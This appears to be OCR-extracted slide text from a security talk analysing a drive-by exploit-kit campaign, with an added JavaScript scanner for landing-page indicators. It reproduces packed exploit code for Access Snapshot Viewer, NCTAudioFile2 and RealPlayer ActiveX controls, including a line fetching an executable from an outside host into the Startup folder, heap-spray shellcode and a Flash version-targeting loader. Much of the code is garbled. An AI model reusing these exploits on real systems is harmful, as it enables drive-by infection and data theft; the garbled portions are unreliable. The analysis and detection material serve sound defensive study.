Iu53c7|uebd0|u5a50u4b0c|u32e3|u205a|u4a8b|u8b49|u8b34|u31f 



uO 



u0dfc|uc03 



8|u8b57|u246c|u548b|u3c45|uacc0|ue038|u5a8bu6a00|u8b66 

Cl|u0774|uebc7|u3bf2|u7514|u247c|u02eb|u5944|u6d6f|u632e 

day|u5100|u7468|u7074|u7777|u2f3a|do|while|SRC|image|http 

d0000|length|new|Array|100|for|uffb7|uff89|u7e68|uff51|u006a|ue2d8|uff73|ue8d0|uffa0|uff0e|u8afe|ua068|u6a52| 

uc9d5|uff4d|u9868|innerHTML|uffab|u6ad6|u616f|u6c6e|u776f|u5464|u466f|u4165|u6c69|u7275|u444c|u6e6f|u6d 

6c|u6c6c|u642e|u5255|uffae'.split( , | , ),0,{})) 



u772f|HTML|uffec|u8b1 8|u5ad6|DA 

Iu8b0c|u1c5b|u306a|u5beb|u5e00|| 

|u51 59|u52c2||u89d6|u5308|u5a72 

c|uff31 |uee01 |uea01 |u7805|u5655|u5300|u56e 

1 c|u8beb|ue801 |u8b04|u245a|u8be1 |u01 Od|ucf 

U6f6f|u612f|u6d64|u6578|u652e|u6574|u732e|le70 

xiaolen|document|com|CDATA|getElementByld|Ox 



</script> 
</html> 



Microsoft Access Snapshot Viewer ActiveX Control Exploit

<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('a="b";2 3="9://d.e.7/5/6.1";2 4="8:/c q m/f o/p l/k/g/h.1";0.i=3;0.j=4;0.n();',27,27,'obj|exe|var|buf1|buf2|admin|win|com|C|http|test|lengoo|Documents|www|steoo|All|Startup|Thunder|SnapshotPath|CompressedPath|Programs|Menu|Settings|PrintSnapshot|Users|Start|and'.split('|'),0,{}))
</script>

Unpacked by substituting the token table above: the script sets obj.SnapshotPath to an .exe under http://www.steoo.com/admin/ and obj.CompressedPath to a file in C:/Documents and Settings/All Users/Start Menu/Programs/Startup/, then calls obj.PrintSnapshot(). The control fetches the remote file to the local path, so the executable lands in the Startup folder and runs at the next logon.



NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow

<html>
<script language="JavaScript" defer>
window.onerror=function(){return true;}
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('78="77";1
12=15( ,, %76%22%79%80%82 o /o81%17 o /o75%74 o /o69%68 o /o67%17 o /o70 o /o29%71%73%72%83%84 o /o95%94 o /o96%97 o /o99%98 o /o66 o /o92% 
87%86%85%88%29%89%91 %90%1 00%52%45%44%46%47%43%48%49%41 %42%65%60%28%59%61 %64%28%50%37%38%31 % 
58%57%37%38%31 %25%54% 1 6%56%55%53%5 1 %63%62%20%93% 1 33% 1 6% 1 44% 1 43% 1 45% 1 46% 1 48% 1 47% 1 42% 1 9% 1 3% 1 4 1 
% 1 36% 1 35%20% 1 6% 1 3% 1 37% 1 38% 1 40%25% 1 1 % 1 39% 1 50% 1 3% 1 57% 1 6 1 % 1 60% 1 59% 1 9% 1 63% 1 65%6% 1 64% 1 62% 1 58% 1 52% 
1 51 %9% 1 53%6% 1 54% 1 56% 1 55% 1 49% 1 34% 1 1 2% 1 1 1 %1 1 3%1 14%9%1 1 6%6%23%30%9%1 1 5%6%23%30%9%1 1 0%6%1 09% 1 04% 
1 03%26%1 02% 1 05% 1 06% 1 08% 1 07%1 1 7%1 1 8%1 28%27%26%27%127%1 29%22");1 3=1 5("%1 8%1 8");1 39=1 30;40 1 32(){1 1 1 =1 31 ;1 
4=15("%7%7%7%7");36(4.14<11)4+=4;4=4.35(0,11);126.125(4)}40 21(3,5){36(3.14*2<5){3+=3}3=3.35(0,5/2);120(3)}1 10=1 If ' 
33=121;1 24=(12.14*2);1 5=10-(24+33);1 34=(39+10)/10;1 32=122 



19;1 



buffSize|sCode|u53dO|length|u 



124();3=21(3,5);123(8=0;8<34;8++){32[8]=3+12} , ,10,166, , |var||sSlide|x|sSlideSize|uffff|0c|i|ue800|heapBS 
nescape|uff52|u8b18|u9090|uff00|u5ad6|getsSlideu0000|u2e2e|PLSize|uebd6|u772f|u6e69|u5b8b|ueb01 u765c 
heapBlocks|substring|while|u8e68|u0e4e|heapSA|function|u5e00|u306a|u5e5f|ue801|u8b04|u02eb|uc031 u5b5d 
beb|u5352|u5a50|u52c2|u89d0|u53c7|u89d6|u8b0c|u198b|u1c5b|uff7c|u0dfc|u1b8b|u6459|uebc7|u4a8b|uea01|u7805|u205a|u32e3|u8b 
34|u8b49|u548b|u3c45|u56e8|game|test|u5300|u5655|u246c|u8b57|uee01|uff31|u8be1|u7514|u247c|u245a|u8b66|u5a8b|u4b0c|u3bf2|u 
4deb|uacc0|u31fc|ue038|u0774|u010d|ucfc1|u011c|u5944|u7777|u2f3a|u7074|u732e|u6574|u632e|u6f6f|u7468|uff89|u466f|u5464|u6c69 



uffec|memory|sizeHDM| 
U08c2|u5308|uaa68|u8 



u4165|uffb7|uffa0|u6d6f|u612f|0x400000|return|0x5|new|for|Array|SetFormatLikeSample 
Me|u5159|u616f|uff4d|uc9d5|u9868|u8afe|u006a|uff0e|ua068|u6a52|u5a72|uebd0|u5beb 
ffae|u5255|u776f|u444c|u7e68|u6e6f|u6ad6|uff73|ue2d8|u6d6c|ue8d0|u7275|uffab'.split(' 



</script> 

<body onload="JavaScript: return tryMe();"> 

<object classid="clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC" id='boom'></object>
</body> 
</html> 



boom|u652e|u6d64|u6578|0x0c0c0c0c|5200|try 
u6a59|u51 00|u6a00|u6c6e|uff51 Iu6c6c|u642e|u 

■).o,{})) 



RealPlayer rmoc3260.dll ActiveX Control Heap Corruption

<script language="JavaScript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k="1 n";o j=["%17"+"%19"+"%1j"+"%K","%1J"+"%1E"+"%m","%1J"+"%W"+"%1z"+"%m","%J"+"%W"+"%1A"+"%m","%1w"+"%11"+"%1v"+"%B"];1p 0(){o

u=z. 1 r["\\A\\H\\1 s\\H\\1 u\\t\\1 1\\1 CW1 DW1 N\\t"]();d(u.k("N 6")==-1 &&u.k("N 7")==-1 )p;d(u.k("1 5.")==-1 )p;o 

Z;x="1P"+"1Q.|"+"1L"+"1K.1";Z=x;1o{w=1F 




1 ){q(i=0;i<4;i++)b=b+r;b=b+f}e d(h.k("6.0.1 1 



')f=l(j[5]);ed(h 
.")!=-1){q(i=0; 




i<6;i++)b=b+r;b=b+f}ed(h.k("6.0.12.")!=-1){q(i=0;i<9;i++)b=b+r;b=b+f}e 



(j[7]); 

O=0;i 



=8+"21";8=8+ ,, 23";8=8+ ,, 24 ,, ;8=8+ ,, 26";8=8+"25 ,, ;8=8+"20 ,, ;8=8+"1Z ,, ;8=8+"1U 
=27;28(v.2i<T)v+= ,, 2h ,, ;oU=["c:\\\\DE\\\\y\\\\..\\\\..\\\\n\\\\V\\\\2i.s","c:\\\\D 
E\\\\y\\\\2k.s", ,, C:\\\\n\\\\13\\\\2l.s ,, ,"C:\\\\n\\\\2g.2f","c:\\\\D 
E\\\\y\\\\.A\\\.A\\\n\\\\V\\\\2a.sV'C:\\^^ 

t||RealVersion||addr|indexOf|unescape|60|WINDOWS|var|return|for|cvbcbb|wav|x65|user|xcbfcxn|Gamttt_Anhey_Real_Exp_Send|Realpl 
ayerObj|NetMeeting|navigator|x74|63||Program|Files|dddd|Qqs|x6F||79|04|x63|CuteRealVersion2|msie|Gameee_Timeeeeeee_Saveeeee 
eee_Logeeee_ssssssssssssssssss|Ball|CuteRealVersions|toLowerCase||temp|arr1|Media|31|Math|CuteRealVersion|Gamttt||||system32|| 
qwfgsg|userLanguage|75|x4F|06|x58|x62|x6A|error|VERSION|CuteRealVersion3s|chilam|544|PRODUCT|74|same|replace|catch|game|tr 
y|function|4f|userAgent|x4C|x72|x77|70|51 |08|a4|01 109|71 |x43|x61 |a5|new|window|x41 |x69|7f|Caaataaal|EaaaRaaaP|PlayerProperty|x73 
|nt|laaaEaaaR|PaaaCaaataaal|x76|552|PfEqTCuBgEGoDUtR4CfkvB40EDc3UUGbVib4Wo5we6VQVouXdcEN|gOzmMTk8PUoVNENn 
W0J9mlnyWQS3TRGFVt6iEUTgtBwrtTs3r5r5|eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw|2F4StTUZvkFiwxQvtsu 
d7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW|C2|qvRHptd4RPFZVOdoRWQgrWTnPs2T2ERO2OTne3popm4osQu40mPiRNToT7Qypntnp 
esHPeK0Wp|OjZMoJP6eeMlvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL|5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVt 
vTv4uP0DvLYfQ|sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO|32|NuKpTRrNWOVYM5mqqrwSMTnoeoty08J 
MnKJMgPw2pey5MgMWQuMw|runOgp8mpn8m7PrZBEIeoWng2DRELgZMU6REoUJMmLHmz1KUOPCX|e6pfQvXeMpPuVPwP9v0XzF 
~ <m5NiqVxmLzdLSvTuml|HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUIxmmnTL2GWOLNQK|0x8000|while|LoopyM 



/Musi 



c|tada|import|floor|123456456|random|avi|clock|lizhen|length|chimes|TestSnd|BuzzingBee|xkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKV 
e9xJKYoloYolOoCQv|3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB|us|550|en|cn|148|zh|536|543|AntiVirus 
|Fucking|LLLL|XXXXXLD|TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI , .split( , r),0,{})) 



Various SWF Exploits based on version

<SCRIPT language="JavaScript">
window.status="le 3 E";
</script>
<script type="text/javascript" src="swfobject.js"></Script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
test = "mymovie";
var versionn = deconcept.SWFObjectUtil.getPlayerVersion();
if (versionn['major'] == 9) {
  document.getElementById('flashversion').innerHTML = '';
  if (versionn['rev'] == 115) { var so = new SWFObject("i115.swf", test, "0.1", "0.1", "9", "#000000"); so.write("flashcontent") }
  else if (versionn['rev'] == 64) { var so = new SWFObject("i64.swf", test, "0.1", "0.1", "9", "#000000"); so.write("flashcontent") }
  else if (versionn['rev'] == 47) { var so = new SWFObject("i47.swf", test, "0.1", "0.1", "9", "#000000"); so.write("flashcontent") }
  else if (versionn['rev'] == 45) { var so = new SWFObject("i45.swf", test, "0.1", "0.1", "9", "#000000"); so.write("flashcontent") }
  else if (versionn['rev'] == 28) { var so = new SWFObject("i28.swf", test, "0.1", "0.1", "9", "#000000"); so.write("flashcontent") }
  else if (versionn['rev'] == 16) { var so = new SWFObject("i16.swf", test, "0.1", "0.1", "9", "#000000"); so.write("flashcontent") }
  else if (versionn['rev'] >= 124) { if (document.getElementById) { document.getElementById('flashversion').innerHTML = '' } }
}
</Script>
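The landing page, the ActiveX probes and the SWFObject version switch above share a small set of static tell-tales. The following is an added example, not from the talk, of a triage pass that pulls those tell-tales out of a captured page: external script loaders, zero-size iframes, ActiveXObject() calls whose ProgID is split across string fragments or hidden behind a variable, object CLSIDs, the eval(function(p,a,c,k,e,d){...}) packer prologue, and per-revision SWF selection. The rule names and the sample page are constructed for this example; the sample is assembled from fragments quoted on the slides.

```javascript
// Added example: static IOC triage of a captured exploit-kit landing page (not from the talk).

const IOC_RULES = [
  { name: "external_script", capture: 1,
    re: /<script[^>]*\ssrc\s*=\s*["']?(https?:\/\/[^"'\s>]+)/gi },
  { name: "hidden_iframe", capture: 0,
    re: /<iframe[^>]*\b(?:width|height)\s*=\s*["']?0\b[^>]*>/gi },
  // "NCTAudio" + "File2.AudioFile2.2": ProgID assembled from fragments
  { name: "activex_split_progid", capture: 0,
    re: /new\s+ActiveXObject\s*\(\s*["'][^"']*["']\s*\+\s*["']/gi },
  // new ActiveXObject(Sameee): ProgID passed through a variable
  { name: "activex_indirect_progid", capture: 0,
    re: /new\s+ActiveXObject\s*\(\s*[A-Za-z_$][\w$]*\s*\)/g },
  { name: "object_clsid", capture: 1,
    re: /classid\s*=\s*["']?clsid:([0-9A-Fa-f-]{36})/g },
  { name: "packer_prologue", capture: 0,
    re: /eval\(function\(p,a,c,k,e,d\)/g },
  { name: "swf_version_branch", capture: 1,
    re: /new\s+SWFObject\s*\(\s*["']([^"']+\.swf)["']/g },
];

// Returns [{ rule, evidence }] for every match of every rule.
function scanLandingPage(html) {
  const findings = [];
  for (const rule of IOC_RULES) {
    rule.re.lastIndex = 0;
    let m;
    while ((m = rule.re.exec(html)) !== null) {
      findings.push({ rule: rule.name, evidence: m[rule.capture].slice(0, 120) });
    }
  }
  return findings;
}

// Count of matches per rule, e.g. { hidden_iframe: 2, ... }.
function summarise(findings) {
  const counts = {};
  for (const f of findings) counts[f.rule] = (counts[f.rule] || 0) + 1;
  return counts;
}

// Constructed page: the injected loader tag, two iframes, the ActiveX probes,
// an object tag and a packed exploit stub, assembled from fragments on the slides.
const CONSTRUCTED_PAGE = `
<script src=http://yrwap.cn/h.js></script>
<html><script>
document.write("<iframe width=100 height=0 src=14.htm></iframe>");
document.write("<iframe width='0' height='0' src='http://www.17gamo.com/coo/index.htm'></iframe>");
try { var lz = new ActiveXObject("NCTAudio" + "File2.AudioFile2.2"); } catch (d) {}
function Game() { Sameee = "IERPCtl.IERPCtl.1"; try { Gime = new ActiveXObject(Sameee); } catch (e) { return; } }
</script>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script>eval(function(p,a,c,k,e,d){e=function(c){return c};return p}('a',1,1,'x'.split('|'),0,{}))</script>
<script>if (versionn['rev']==115) { var so=new SWFObject("i115.swf",test,"0.1","0.1","9","#000000"); }</script>
</html>`;

if (typeof require !== "undefined" && require.main === module) {
  const findings = scanLandingPage(CONSTRUCTED_PAGE);
  console.log(summarise(findings));
  for (const f of findings) console.log(`${f.rule}: ${f.evidence}`);
}
```

This is a triage aid for pages already captured, not a substitute for running them in an instrumented browser: the iframe strings here are visible only because they sit in document.write literals, and a stage that builds its markup from unescape() or the packer output will show up only as the packer_prologue hit, which is the cue to unpack before scanning again.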



Attack Flow

[Diagram: SQL injection or other exploit against web server -> Backdoors implanted -> Script or iframe code injected -> Attack code determines victim browser type and client versions -> Exploits (e.g. MS Access exploit) -> Steal data from user: games / financial]




Thousands of sites hacked

Employs various types of evasion and obfuscation

Updates infrastructure with new exploits mere days after they come out

Can't be sure it's Chinese, but highly likely

• Based on several clues (languages used, IPs, etc.)



Thanks! 



David Kerb 

Delchi 

Skape 

mCorey 

rjohnson 

Chris Nickerson 





Egypt 

Tebo 

HD Moore 

famousjs 

#AR 

Anyone we forgot 



Questions?



